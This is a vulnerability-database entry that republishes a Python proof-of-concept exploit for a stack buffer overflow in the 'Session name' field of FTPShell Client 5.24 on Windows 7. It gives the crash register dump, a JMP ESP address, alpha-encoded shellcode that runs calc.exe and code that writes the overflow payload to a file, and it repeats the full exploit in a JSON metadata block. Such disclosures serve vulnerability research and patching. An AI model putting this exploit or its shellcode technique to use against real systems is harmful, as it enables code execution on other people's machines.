Search...

FTPShell Client 5.24 - Add to Favorites Buffer Overflow

2016-01-04T00:00:00

ID EXPLOITPACK:3C9AFAF9B05B6CDACE7BA7DDE4E87F5C
Type exploitpack
Reporter INSECT.B
Modified 2016-01-04T00:00:00

Description

FTPShell Client 5.24 - Add to Favorites Buffer Overflow

                                        
                                            # Exploit Title: FTPShell Client 5.24 - Add to Favorites Buffer Overflow
# Google Dork: N/A
# Date: 2015-01-04
# Exploit Author: INSECT.B
#	Twitter : @INSECT.B
#	Facebook : https://www.facebook.com/B.INSECT00
#	Blog : http://binsect00.tistory.com
# Vendor Homepage: www.ftpshell.com
# Software Link: http://www.ftpshell.com/download.htm
# Version: 5.24
# Tested on: Windows7 Ultimate SP1 K x86 
# CVE : N/A

"""
[+] Type : Buffer Overflow
[-]	 ftpsehll client has a buffer overlow entry point in the [Favorites] - [Add to favorites..] 'Session name' input field
[-]	used to add session to favorites list .

[+]Crash : input 'A' x 1500 to Session name field
[-] (4c4.8f8): Access violation - code c0000005 (!!! second chance !!!)
[-] eax=00000000 ebx=00944a0c ecx=00000000 edx=41414141 esi=00000500 edi=0012fe1c
[-] eip=41414141 esp=0012fd54 ebp=41414141 iopl=0         nv up ei pl zr na pe nc
[-] cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
[-] 41414141 ??              ???
"""

import struct

junk = "A"*460
junk2 = "\x90"*248

esp = "\x0B\xD4\xDF\x73" # JMP ESP

#shellcode
#CMD : calc.exe
#encoder : Alpha-mix encoder
#buffer register : esp 
sc = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" +
"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42" +
"\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x38\x68" +
"\x4b\x32\x33\x30\x75\x50\x63\x30\x65\x30\x6c\x49\x5a\x45" +
"\x65\x61\x39\x50\x35\x34\x4c\x4b\x46\x30\x54\x70\x4e\x6b" +
"\x63\x62\x46\x6c\x6e\x6b\x43\x62\x47\x64\x4c\x4b\x44\x32" +
"\x46\x48\x74\x4f\x4f\x47\x51\x5a\x37\x56\x35\x61\x59\x6f" +
"\x6e\x4c\x45\x6c\x43\x51\x53\x4c\x43\x32\x44\x6c\x65\x70" +
"\x5a\x61\x5a\x6f\x74\x4d\x37\x71\x6a\x67\x4a\x42\x39\x62" +
"\x76\x32\x42\x77\x6c\x4b\x31\x42\x36\x70\x4e\x6b\x33\x7a" +
"\x57\x4c\x6e\x6b\x32\x6c\x66\x71\x42\x58\x78\x63\x53\x78" +
"\x73\x31\x7a\x71\x36\x31\x4e\x6b\x66\x39\x51\x30\x36\x61" +
"\x59\x43\x6e\x6b\x57\x39\x62\x38\x58\x63\x45\x6a\x52\x69" +
"\x6c\x4b\x44\x74\x4e\x6b\x55\x51\x7a\x76\x70\x31\x69\x6f" +
"\x6c\x6c\x6f\x31\x48\x4f\x36\x6d\x65\x51\x7a\x67\x76\x58" +
"\x59\x70\x61\x65\x48\x76\x53\x33\x71\x6d\x4b\x48\x35\x6b" +
"\x61\x6d\x36\x44\x31\x65\x4b\x54\x30\x58\x6e\x6b\x66\x38" +
"\x76\x44\x56\x61\x4e\x33\x51\x76\x6c\x4b\x74\x4c\x72\x6b" +
"\x6e\x6b\x71\x48\x47\x6c\x57\x71\x7a\x73\x4c\x4b\x66\x64" +
"\x6e\x6b\x36\x61\x6e\x30\x4d\x59\x50\x44\x57\x54\x66\x44" +
"\x63\x6b\x71\x4b\x61\x71\x63\x69\x61\x4a\x36\x31\x39\x6f" +
"\x59\x70\x61\x4f\x61\x4f\x52\x7a\x4c\x4b\x64\x52\x5a\x4b" +
"\x6e\x6d\x31\x4d\x32\x4a\x75\x51\x6c\x4d\x4b\x35\x48\x32" +
"\x75\x50\x65\x50\x67\x70\x66\x30\x73\x58\x65\x61\x4c\x4b" +
"\x52\x4f\x6b\x37\x59\x6f\x48\x55\x4d\x6b\x38\x70\x78\x35" +
"\x59\x32\x33\x66\x72\x48\x79\x36\x5a\x35\x6d\x6d\x4d\x4d" +
"\x6b\x4f\x58\x55\x45\x6c\x33\x36\x61\x6c\x76\x6a\x6b\x30" +
"\x6b\x4b\x4d\x30\x54\x35\x45\x55\x4f\x4b\x62\x67\x37\x63" +
"\x70\x72\x70\x6f\x70\x6a\x45\x50\x46\x33\x69\x6f\x49\x45" +
"\x50\x63\x65\x31\x50\x6c\x71\x73\x46\x4e\x42\x45\x70\x78" +
"\x73\x55\x75\x50\x41\x41"
)



payload = junk + esp + sc + junk2

file=open("C:\\shelll","w")
file.write(payload)
file.close()

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:04:15", "references": [], "description": "\nFTPShell Client 5.24 - Add to Favorites Buffer Overflow", "edition": 1, "reporter": "INSECT.B", "exploitpack": {"type": "local", "platform": "windows"}, "published": "2016-01-04T00:00:00", "title": "FTPShell Client 5.24 - Add to Favorites Buffer Overflow", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:15", "rev": 2}, "score": {"value": 0.5, "vector": "NONE", "modified": "2020-04-01T19:04:15", "rev": 2}, "vulnersScore": 0.5}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-01-04T00:00:00", "id": "EXPLOITPACK:3C9AFAF9B05B6CDACE7BA7DDE4E87F5C", "href": "", "viewCount": 0, "sourceData": "# Exploit Title: FTPShell Client 5.24 - Add to Favorites Buffer Overflow\n# Google Dork: N/A\n# Date: 2015-01-04\n# Exploit Author: INSECT.B\n#\tTwitter : @INSECT.B\n#\tFacebook : https://www.facebook.com/B.INSECT00\n#\tBlog : http://binsect00.tistory.com\n# Vendor Homepage: www.ftpshell.com\n# Software Link: http://www.ftpshell.com/download.htm\n# Version: 5.24\n# Tested on: Windows7 Ultimate SP1 K x86 \n# CVE : N/A\n\n\"\"\"\n[+] Type : Buffer Overflow\n[-]\t ftpsehll client has a buffer overlow entry point in the [Favorites] - [Add to favorites..] 'Session name' input field\n[-]\tused to add session to favorites list .\n\n[+]Crash : input 'A' x 1500 to Session name field\n[-] (4c4.8f8): Access violation - code c0000005 (!!! second chance !!!)\n[-] eax=00000000 ebx=00944a0c ecx=00000000 edx=41414141 esi=00000500 edi=0012fe1c\n[-] eip=41414141 esp=0012fd54 ebp=41414141 iopl=0 nv up ei pl zr na pe nc\n[-] cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246\n[-] 41414141 ?? ???\n\"\"\"\n\nimport struct\n\njunk = \"A\"*460\njunk2 = \"\\x90\"*248\n\nesp = \"\\x0B\\xD4\\xDF\\x73\" # JMP ESP\n\n#shellcode\n#CMD : calc.exe\n#encoder : Alpha-mix encoder\n#buffer register : esp \nsc = (\"\\x54\\x59\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\" +\n\"\\x49\\x49\\x49\\x49\\x37\\x51\\x5a\\x6a\\x41\\x58\\x50\\x30\\x41\\x30\" +\n\"\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30\\x42\\x42\" +\n\"\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x4b\\x4c\\x38\\x68\" +\n\"\\x4b\\x32\\x33\\x30\\x75\\x50\\x63\\x30\\x65\\x30\\x6c\\x49\\x5a\\x45\" +\n\"\\x65\\x61\\x39\\x50\\x35\\x34\\x4c\\x4b\\x46\\x30\\x54\\x70\\x4e\\x6b\" +\n\"\\x63\\x62\\x46\\x6c\\x6e\\x6b\\x43\\x62\\x47\\x64\\x4c\\x4b\\x44\\x32\" +\n\"\\x46\\x48\\x74\\x4f\\x4f\\x47\\x51\\x5a\\x37\\x56\\x35\\x61\\x59\\x6f\" +\n\"\\x6e\\x4c\\x45\\x6c\\x43\\x51\\x53\\x4c\\x43\\x32\\x44\\x6c\\x65\\x70\" +\n\"\\x5a\\x61\\x5a\\x6f\\x74\\x4d\\x37\\x71\\x6a\\x67\\x4a\\x42\\x39\\x62\" +\n\"\\x76\\x32\\x42\\x77\\x6c\\x4b\\x31\\x42\\x36\\x70\\x4e\\x6b\\x33\\x7a\" +\n\"\\x57\\x4c\\x6e\\x6b\\x32\\x6c\\x66\\x71\\x42\\x58\\x78\\x63\\x53\\x78\" +\n\"\\x73\\x31\\x7a\\x71\\x36\\x31\\x4e\\x6b\\x66\\x39\\x51\\x30\\x36\\x61\" +\n\"\\x59\\x43\\x6e\\x6b\\x57\\x39\\x62\\x38\\x58\\x63\\x45\\x6a\\x52\\x69\" +\n\"\\x6c\\x4b\\x44\\x74\\x4e\\x6b\\x55\\x51\\x7a\\x76\\x70\\x31\\x69\\x6f\" +\n\"\\x6c\\x6c\\x6f\\x31\\x48\\x4f\\x36\\x6d\\x65\\x51\\x7a\\x67\\x76\\x58\" +\n\"\\x59\\x70\\x61\\x65\\x48\\x76\\x53\\x33\\x71\\x6d\\x4b\\x48\\x35\\x6b\" +\n\"\\x61\\x6d\\x36\\x44\\x31\\x65\\x4b\\x54\\x30\\x58\\x6e\\x6b\\x66\\x38\" +\n\"\\x76\\x44\\x56\\x61\\x4e\\x33\\x51\\x76\\x6c\\x4b\\x74\\x4c\\x72\\x6b\" +\n\"\\x6e\\x6b\\x71\\x48\\x47\\x6c\\x57\\x71\\x7a\\x73\\x4c\\x4b\\x66\\x64\" +\n\"\\x6e\\x6b\\x36\\x61\\x6e\\x30\\x4d\\x59\\x50\\x44\\x57\\x54\\x66\\x44\" +\n\"\\x63\\x6b\\x71\\x4b\\x61\\x71\\x63\\x69\\x61\\x4a\\x36\\x31\\x39\\x6f\" +\n\"\\x59\\x70\\x61\\x4f\\x61\\x4f\\x52\\x7a\\x4c\\x4b\\x64\\x52\\x5a\\x4b\" +\n\"\\x6e\\x6d\\x31\\x4d\\x32\\x4a\\x75\\x51\\x6c\\x4d\\x4b\\x35\\x48\\x32\" +\n\"\\x75\\x50\\x65\\x50\\x67\\x70\\x66\\x30\\x73\\x58\\x65\\x61\\x4c\\x4b\" +\n\"\\x52\\x4f\\x6b\\x37\\x59\\x6f\\x48\\x55\\x4d\\x6b\\x38\\x70\\x78\\x35\" +\n\"\\x59\\x32\\x33\\x66\\x72\\x48\\x79\\x36\\x5a\\x35\\x6d\\x6d\\x4d\\x4d\" +\n\"\\x6b\\x4f\\x58\\x55\\x45\\x6c\\x33\\x36\\x61\\x6c\\x76\\x6a\\x6b\\x30\" +\n\"\\x6b\\x4b\\x4d\\x30\\x54\\x35\\x45\\x55\\x4f\\x4b\\x62\\x67\\x37\\x63\" +\n\"\\x70\\x72\\x70\\x6f\\x70\\x6a\\x45\\x50\\x46\\x33\\x69\\x6f\\x49\\x45\" +\n\"\\x50\\x63\\x65\\x31\\x50\\x6c\\x71\\x73\\x46\\x4e\\x42\\x45\\x70\\x78\" +\n\"\\x73\\x55\\x75\\x50\\x41\\x41\"\n)\n\n\n\npayload = junk + esp + sc + junk2\n\nfile=open(\"C:\\\\shelll\",\"w\")\nfile.write(payload)\nfile.close()", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": []}